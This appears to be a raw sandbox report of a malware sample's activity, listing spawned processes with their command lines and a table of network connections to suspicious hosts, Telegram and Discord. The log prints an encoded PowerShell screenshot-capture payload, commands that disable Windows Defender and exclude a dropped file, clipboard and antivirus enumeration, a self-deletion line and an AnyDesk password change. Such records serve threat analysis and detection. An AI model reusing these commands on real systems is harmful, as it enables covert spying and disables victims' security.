C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Users\Admin\AppData\Local\Temp\a\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe

"C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe"

C:\Users\Admin\AppData\Local\Temp\bound.exe

bound.exe

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\explorer.exe

explorer.exe

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe

"C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 6004 -ip 6004

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Users\Admin\AppData\Local\complacence\outvaunts.exe

"C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6004 -s 992

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo L0ckB1tter3 "

\??\c:\Program Files (x86)\AnyDesk\AnyDesk.exe

"c:\Program Files (x86)\AnyDesk\anydesk.exe" --set-password

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3352 -ip 3352

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3352 -s 188

C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

Network

Country Destination Domain Proto
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.66.49:443 urlhaus.abuse.ch tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
RU 31.41.244.11:80 31.41.244.11 tcp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 49.66.101.151.in-addr.arpa udp
US 8.8.8.8:53 11.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
RU 185.215.113.209:80 185.215.113.209 tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 209.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 gateway.discord.gg udp
US 162.159.136.234:443 gateway.discord.gg tcp
US 8.8.8.8:53 234.136.159.162.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 geolocation-db.com udp
DE 159.89.102.253:443 geolocation-db.com tcp
US 8.8.8.8:53 232.136.159.162.in-addr.arpa udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 253.102.89.159.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
FR 194.59.30.220:1336 tcp
US 8.8.8.8:53 220.30.59.194.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
RU 31.41.244.10:80 31.41.244.10 tcp
US 8.8.8.8:53 10.244.41.31.in-addr.arpa udp
RU 31.41.244.12:80 31.41.244.12 tcp
US 8.8.8.8:53 12.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
FR 142.250.75.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
FR 142.250.179.67:80 c.pki.goog tcp
US 8.8.8.8:53 238.75.250.142.in-addr.arpa udp
US 8.8.8.8:53 67.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 o.pki.goog udp
FR 142.250.179.67:80 o.pki.goog tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
FR 142.250.74.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 225.74.250.142.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 88.221.135.115:80 r11.o.lencr.org tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 96.33.115.104.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 115.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 24.249.124.192.in-addr.arpa udp
RU 31.41.244.9:80 31.41.244.9 tcp
US 8.8.8.8:53 9.244.41.31.in-addr.arpa udp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 16.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 grahm.xyz udp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 31.10.203.116.in-addr.arpa udp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 infect-crackle.cyou udp
US 8.8.8.8:53 e5.o.lencr.org udp
GB 88.221.135.115:80 e5.o.lencr.org tcp
US 172.67.216.167:443 infect-crackle.cyou tcp
US 8.8.8.8:53 se-blurry.biz udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 8.8.8.8:53 formy-spill.biz udp
US 8.8.8.8:53 covery-mover.biz udp
US 172.67.206.64:443 covery-mover.biz tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 167.216.67.172.in-addr.arpa udp
US 8.8.8.8:53 ikswccmqsqeswegi.xyz udp
US 8.8.8.8:53 aukuqiksseyscgie.xyz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 fightlsoser.click udp
US 8.8.8.8:53 dare-curbys.biz udp
US 8.8.8.8:53 print-vexer.biz udp
US 172.67.213.48:443 fightlsoser.click tcp
US 8.8.8.8:53 impend-differ.biz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 172.67.206.64:443 covery-mover.biz tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 64.206.67.172.in-addr.arpa udp
US 8.8.8.8:53 124.191.200.185.in-addr.arpa udp
US 8.8.8.8:53 48.213.67.172.in-addr.arpa udp
GB 23.214.143.155:443 steamcommunity.com tcp
DE 116.203.10.31:443 grahm.xyz tcp
N/A 224.0.0.251:5353 udp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 155.143.214.23.in-addr.arpa udp
US 66.45.226.53:7777 66.45.226.53 tcp
RU 83.217.204.194:80 83.217.204.194 tcp
RU 178.215.120.185:1723 tcp
RU 83.217.206.117:3389 tcp
RU 83.217.192.194:8080 83.217.192.194 tcp
RU 83.217.206.25:2000 tcp
RU 213.108.16.154:111 tcp
RU 89.169.1.216:443 tcp
RU 178.215.75.170:80 tcp
RU 178.215.74.17:23 tcp
RU 83.217.192.194:8080 tcp
RU 83.217.219.114:465 tcp
RU 89.169.20.205:49155 tcp
RU 178.215.74.228:8011 tcp
RU 83.217.197.147:22 tcp
RU 89.169.1.199:22 tcp
RU 89.169.41.215:443 tcp
RU 83.217.192.194:8080 tcp
RU 89.169.0.114:8292 tcp
RU 89.169.22.207:8080 tcp
RU 178.215.90.34:80 tcp
RU 213.108.19.30:445 tcp
US 8.8.8.8:53 53.226.45.66.in-addr.arpa udp
US 8.8.8.8:53 194.204.217.83.in-addr.arpa udp
US 8.8.8.8:53 170.75.215.178.in-addr.arpa udp
US 8.8.8.8:53 147.197.217.83.in-addr.arpa udp
US 8.8.8.8:53 228.74.215.178.in-addr.arpa udp
US 8.8.8.8:53 30.19.108.213.in-addr.arpa udp
US 8.8.8.8:53 194.192.217.83.in-addr.arpa udp
US 8.8.8.8:53 peerhost59mj7i6macla65r.com udp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
US 8.8.8.8:53 218.172.154.94.in-addr.arpa udp
US 8.8.8.8:53 34.90.215.178.in-addr.arpa udp
US 8.8.8.8:53 ikswccmqsqeswegi.xyz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
RU 31.41.244.11:80 31.41.244.11 tcp
NL 149.154.167.99:443 t.me tcp
DE 116.203.10.31:443 grahm.xyz tcp
NL 149.154.167.220:443 api.telegram.org tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
FR 142.250.75.238:443 drive.google.com tcp
DE 116.203.10.31:443 grahm.xyz tcp
FR 142.250.74.225:443 drive.usercontent.google.com tcp
DE 116.203.10.31:443 grahm.xyz tcp
N/A 127.0.0.1:8080 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
NL 149.154.167.220:443 api.telegram.org tcp
DE 101.99.92.189:8080 tcp
US 8.8.8.8:53 189.92.99.101.in-addr.arpa udp
US 8.8.8.8:53 sanboxland.pro udp
GB 89.35.131.209:80 sanboxland.pro tcp
US 8.8.8.8:53 209.131.35.89.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 grahm.xyz udp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 drive-connect.cyou udp
US 172.67.139.78:443 drive-connect.cyou tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 se-blurry.biz udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 8.8.8.8:53 formy-spill.biz udp
US 8.8.8.8:53 covery-mover.biz udp
US 104.21.58.186:443 covery-mover.biz tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 dare-curbys.biz udp
US 8.8.8.8:53 print-vexer.biz udp
US 8.8.8.8:53 78.139.67.172.in-addr.arpa udp
US 8.8.8.8:53 186.58.21.104.in-addr.arpa udp
US 8.8.8.8:53 impend-differ.biz udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.123.95.227:443 steamcommunity.com tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 227.95.123.104.in-addr.arpa udp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 a1060630.xsph.ru udp
RU 141.8.192.138:80 a1060630.xsph.ru tcp
US 8.8.8.8:53 138.192.8.141.in-addr.arpa udp
FR 142.250.75.238:443 drive.google.com tcp
FR 142.250.74.225:443 drive.usercontent.google.com tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 f0706909.xsph.ru udp
RU 141.8.193.236:80 f0706909.xsph.ru tcp
US 8.8.8.8:53 ipwho.is udp
DE 195.201.57.90:80 ipwho.is tcp
US 8.8.8.8:53 236.193.8.141.in-addr.arpa udp
US 8.8.8.8:53 90.57.201.195.in-addr.arpa udp
US 8.8.8.8:53 1.173.189.20.in-addr.arpa udp
N/A 127.0.0.1:64295 tcp
N/A 127.0.0.1:64433 tcp
DE 185.220.101.195:443 tcp
US 8.8.8.8:53 195.101.220.185.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
FR 62.210.131.119:9001 tcp
DE 51.89.106.29:8080 tcp
US 8.8.8.8:53 119.131.210.62.in-addr.arpa udp
US 8.8.8.8:53 29.106.89.51.in-addr.arpa udp
US 8.8.8.8:53 a1059592.xsph.ru udp
RU 141.8.192.138:80 a1059592.xsph.ru tcp
FR 94.23.121.150:9001 tcp
US 8.8.8.8:53 f1043947.xsph.ru udp
RU 141.8.192.151:80 f1043947.xsph.ru tcp
US 8.8.8.8:53 150.121.23.94.in-addr.arpa udp
US 8.8.8.8:53 151.192.8.141.in-addr.arpa udp
US 8.8.8.8:53 a1051707.xsph.ru udp
RU 141.8.192.217:80 a1051707.xsph.ru tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 freegeoip.app udp
GB 20.26.156.215:80 github.com tcp
US 172.67.160.84:443 freegeoip.app tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 ipbase.com udp
FR 142.250.75.227:443 gstatic.com tcp
US 172.67.209.71:443 ipbase.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 217.192.8.141.in-addr.arpa udp
US 8.8.8.8:53 84.160.67.172.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 227.75.250.142.in-addr.arpa udp
US 8.8.8.8:53 71.209.67.172.in-addr.arpa udp
US 154.216.17.90:80 tcp
RU 176.113.115.19:80 176.113.115.19 tcp
US 8.8.8.8:53 19.115.113.176.in-addr.arpa udp
US 8.8.8.8:53 www.speak-a-message.com udp
DE 195.201.119.163:80 www.speak-a-message.com tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 163.119.201.195.in-addr.arpa udp
US 8.8.8.8:53 awake-weaves.cyou udp
US 8.8.8.8:53 ipwho.is udp
US 8.8.8.8:53 ip-api.com udp
US 172.67.143.116:443 awake-weaves.cyou tcp
DE 195.201.57.90:80 ipwho.is tcp
